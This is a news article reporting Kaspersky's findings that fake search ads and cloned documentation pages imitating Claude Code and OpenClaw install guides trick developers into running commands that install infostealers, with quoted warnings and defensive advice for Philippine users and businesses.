Fake AI tool ads spread malware

Cybercriminals are using fake ads and cloned websites that imitate legitimate AI tool installation pages to trick users into downloading malware, according to Kaspersky.

Sam Yan, head of sales for Asia Emerging Countries at Kaspersky, said the campaign is especially dangerous because it blends into how developers normally work.

“This campaign is particularly dangerous because it blends seamlessly into a developer’s normal workflow. Our researchers found that the fake pages are visually identical to official documentation and are being served through paid search advertisements so there is no obvious red flag. Developers who copy and execute the commands are simply doing what they would normally do, except the instructions deliver malware instead of the tool they were looking for. Developers typically have access to source code, corporate credentials, and sensitive systems, meaning a single infection can put entire organizations at risk,” Yan said.

The campaign targets users looking for popular AI developer tools such as Claude Code and OpenClaw.

Yan said these AI tools have become attractive targets because more developers and organizations now rely on them in daily work.

“The growing reliance on AI tools like Claude Code and OpenClaw is precisely what makes them attractive targets. As more developers and organizations integrate these tools into their daily workflows, cybercriminals see a larger and more valuable pool of potential victims. The more indispensable a tool becomes, the less likely users are to second-guess the installation process, and that trust is exactly what attackers are banking on,” Yan said.

Kaspersky said the attack may begin when users search for “Claude Code download,” click sponsored ads, and land on fake documentation hosted on Squarespace.

Users are then instructed to follow copy-paste commands that install malware instead of the AI tool they intended to download.

“As mentioned in our statement, K aspersky discovers infostealers mimicking Claude Code, OpenClaw and other AI developer tools,users search for “Claude Code download,” click sponsored ads, land on fake documentation hosted on Squarespace, follow copy-paste commands, and install malware (Amatera on Windows, AMOS on macOS) that steals sensitive data,” Yan said.

The malware can steal sensitive information, including login credentials, browser activity, and cryptocurrency wallet information.

Kaspersky said users should watch for installation pages reached through ads instead of official websites.

Yan said other red flags include commands copied from external sources without verification, documentation hosted on unfamiliar domains even if visually identical to legitimate pages, and instructions not linked directly from official project channels.

The threat is significant for freelancers, developers, startup teams, and remote workers in the Philippines, many of whom use AI tools but may not have dedicated cybersecurity support, Yan said.

“The risk is significant. Freelancers, developers, and startup teams in the Philippines are among the most active adopters of AI tools, and many of them work without dedicated security support. That makes them highly vulnerable. A single infection does not just compromise personal data. It can expose client source code, corporate credentials, and confidential project files. For someone whose entire business runs on their laptop and their accounts, that kind of breach can be devastating,” Yan said.

Yan said infected devices can expose more than personal accounts and passwords.

“Most people think of a hacked account as losing a password or having personal photos stolen. But for developers and employees using these tools, the stakes are much higher. When their device is infected, attackers can access the actual work stored on their computer, including the projects they are building, the login credentials they use to access their company’s systems, and the confidential files they handle every day. One infected device can become a doorway into an entire organization,” Yan said.

The threat shows that companies should treat AI tool adoption as a cybersecurity concern, not only as a productivity issue.

“Every time a new technology becomes widely adopted, cybercriminals follow. The threat is not new. It has simply moved to a new target. Attackers were already exploiting trusted platforms, search engines, and legitimate-looking websites long before AI tools became mainstream. What has changed is that AI tools are now popular enough to be worth targeting. Companies should not see this as a reason to slow down AI adoption but as a reminder to apply the same security awareness and vetting they would with any widely used technology. The right response is education and vigilance,” Yan said.

Yan said search engines, ad platforms, and hosting providers should also help prevent malicious pages from reaching users.

“They have the reach and the tools to detect and remove malicious content before it reaches users. The responsibility cannot fall on the user alone, especially when the attack is designed to look completely legitimate. Greater scrutiny of sponsored content and faster takedown processes would go a long way,” Yan said.

For Philippine businesses, especially small and medium enterprises without dedicated cybersecurity teams, Kaspersky recommended immediate safeguards to reduce the risk:

-Verify that download links come from official project websites

-Review command-line instructions before running them

-Avoid guides they do not fully understand or did not directly request

-Use endpoint security tools that can detect infostealers.

Yan said the most important habit for users is to verify installation links and command-line instructions before executing them, even if a page looks legitimate.

“Users must always verify installation links and command-line instructions from official sources before executing them, even if the page looks legitimate,” Yan said.